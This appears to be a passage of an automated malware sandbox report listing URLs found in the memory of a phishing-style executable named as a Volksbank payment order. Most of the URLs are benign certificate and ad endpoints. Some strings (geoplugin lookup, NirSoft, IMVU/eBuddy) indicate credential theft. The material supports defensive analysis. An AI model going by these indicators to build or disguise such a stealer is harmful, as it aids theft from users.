            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certificates.godaddy.com/repository/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://certs.godaddy.com/repository/1301
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://contentstorage.osi.office.net/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3234667457.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.2976678196.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7800247694.00000000041B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp?
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpb9
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpgramFi
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://i.pki.goog/r1.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://i.pki.goog/wr2.crt0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://o.pki.goog/wr20%
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://o.ss2.us/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0B
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0F
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0G
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0H
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0K
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0M
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/02
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.godaddy.com/05
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp.sectigo.com0%
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://ocspx.digicert.com0E
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://s.ss2.us/r.crl0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://status.geotrust.com0=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://status.thawte.com09
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0u
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0v
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0~
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980917475.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/pn_
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: http://x.ss2.us/x.cer0&
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3003974432.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005763130.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Q
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/favicon.ico
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&conn
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapshim_IX6xrWCoGcREOsbbsQ1Yvg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://capturemedia-assets.com/
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://certs.godaddy.com/repository/0
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://clientconfig.microsoftonline-p.net
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contextual.media.net/
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contextual.media.net/48/nrrV39259.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
